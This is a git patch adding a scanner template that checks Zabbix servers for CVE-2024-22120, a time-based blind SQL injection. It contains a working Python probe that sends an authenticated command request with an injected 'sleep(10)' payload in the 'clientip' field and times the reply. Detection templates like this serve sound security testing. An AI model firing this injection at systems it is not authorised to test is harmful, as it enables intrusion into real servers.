From a1e77eded0616bb2e8301893a040ba56a14ea5ec Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 3 Sep 2024 15:22:25 +0400
Subject: [PATCH] Create CVE-2024-22120.yaml

---
 code/cves/2024/CVE-2024-22120.yaml | 56 ++++++++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 code/cves/2024/CVE-2024-22120.yaml

diff --git a/code/cves/2024/CVE-2024-22120.yaml b/code/cves/2024/CVE-2024-22120.yaml
new file mode 100644
index 0000000000..ed19e816db
--- /dev/null
+++ b/code/cves/2024/CVE-2024-22120.yaml
@@ -0,0 +1,56 @@
+id: CVE-2024-22120
+
+info:
+  name: Zabbix Server - Time-Based Blind SQL injection
+  author: CodeStuffBreakThings
+  severity: critical
+  description: |
+    The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
+  remediation: |
+    Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
+  reference:
+    - https://support.zabbix.com/browse/ZBX-24505#/
+    - https://github.com/W01fh4cker/CVE-2024-22120-RCE
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22120
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.1
+    cve-id: CVE-2024-22120
+  tags: zabbix,sqli,cve,cve2024,authenticated
+
+variables:
+  HOST: "{{Host}}"
+  PORT: "{{Port}}"
+  SID: "{{SID}}"
+  HOSTID: "{{HOSTID}}"
+
+code:
+  - engine:
+      - py
+      - python3
+    source: |
+      import os, struct, socket
+      from datetime import datetime
+      hostname=os.getenv('HOST')
+      port=int(os.getenv('PORT'))
+      sid=os.getenv('SID')
+      hostid=os.getenv('HOSTID')
+      zbx_header = "ZBXD\x01".encode()
+      message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
+      message_length = struct.pack('<q', len(message_json))
+      message = zbx_header + message_length + message_json.encode()
+      before_query = datetime.now().timestamp()
+      s = socket.socket()
+      s.connect((hostname,port))
+      s.send(message)
+      response = s.recv(1024)
+      s.close()
+      after_query = datetime.now().timestamp()
+      responsetime = after_query - before_query
+      if responsetime >= 10 and zbx_header in response:
+          print("Vulnerable to CVE-2024-22120")
+
+    matchers:
+      - type: word
+        words:
+          - "Vulnerable to CVE-2024-22120"